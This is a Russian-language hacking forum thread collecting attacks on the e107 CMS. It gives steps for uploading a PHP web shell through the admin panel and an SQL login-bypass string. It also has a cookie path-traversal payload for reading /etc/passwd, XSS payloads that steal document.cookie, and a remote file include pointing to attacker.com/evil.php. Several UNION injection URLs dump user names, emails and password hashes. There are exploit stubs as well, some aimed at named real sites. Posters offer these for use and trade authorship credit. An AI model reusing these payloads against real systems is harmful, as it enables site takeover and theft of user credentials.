![]() |
[ Обзор уязвимостей e107 cms ]
САБЖ
|
Загрузка шела в e107 cms
Админка: " Зайгрузки файлов пользователями ": разрешаем загружать загрузки +"нормальный файл", добавляем " .php " в "Разрешённые типы файлов".
В меню появляются "Загрузка", заливаем файл. target/e107_files/public/file.php +посмотреть полный путь можно через админ панель категория " Зайгрузки файлов пользователями " |
Обзор уязвимостей [e107] cms
<=0.6
file create exploit Уязвимость пристутствует из-за неправильной обработке реквестов к серверу, существует возможность послать свои собственные и создать произвольный файл. <=0.6.17 Active xss PoC 0.617 sql inj + remote code exec Уязвимсоть присутствует из-за плохой проверки на логин. Возможно авторизироваться в админ панели с логином вида Код:
or isnull(1/0)/*<=0.75 globals overwrite Использует перезапись глобальных переменных с помощью пхп-баги - Zend_Hash_Del_Key_Or_Index cookie file include Работвет при register_globals = on, перезаписывает глобальную переменную e_LANGUAGE в кукисах. Код:
Cookie: e107language_e107cookie=../../../../../../../../../etc/passwd%000.7.8 Upload file exploit (нужен админ) Уязвимость присутствует из-за использования popen ф-ии на параметр $mailer, который пеердается через адресную строку в админ панеле. Аплоуд файлов в галерее Нет нормальной проверки на экстеншен. Возможен аплоуд файлов с расширением shell.php.jpg |
Multiple XSS in Chatbox, forum posts:
Код HTML:
[img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]Код:
In Submit comment:e107 with the Chatbox.php (tagboard) module enabled.DoS. In the Name inputbox of the Chatbox type: Код:
<script = javascript> alert('DoS') <script>Html attachment: Код:
<html>Код:
GET http://virtech.org/e107/e107_plugins/netquery/nquser.php HTTP/1.0XSS in "user settings" (usersettings.php): Код:
http://target/e107_0615/usersettings.php?avmsg=[xss code here]Код:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0.6.15 Код:
http://target/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php0.6.15 Sql injection bug in "news.php": Код:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*Код:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*Код:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* |
Загрузка шела e107 cms
вот типа такого, но можно и без таблиц))но
надо знать диру для записи: Цитата:
|
Фу ты блин а я уж думал нету специальной темы под эту цмс. ГГ откопал)
0.7.11 (мб и ранние версии) Passive XSS Код:
http://e107/e107_plugins/content/handlers/content_preset.php |
Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
Код:
<form action="http://tanibata.ru/contact.php" method="POST"> |
e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl |
>Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
это мой) |
Description: e107 versions 0.7.11 and below suffer from an arbitrary variable overwriting vulnerability.
Код:
########################################################## |
| Время: 11:25 |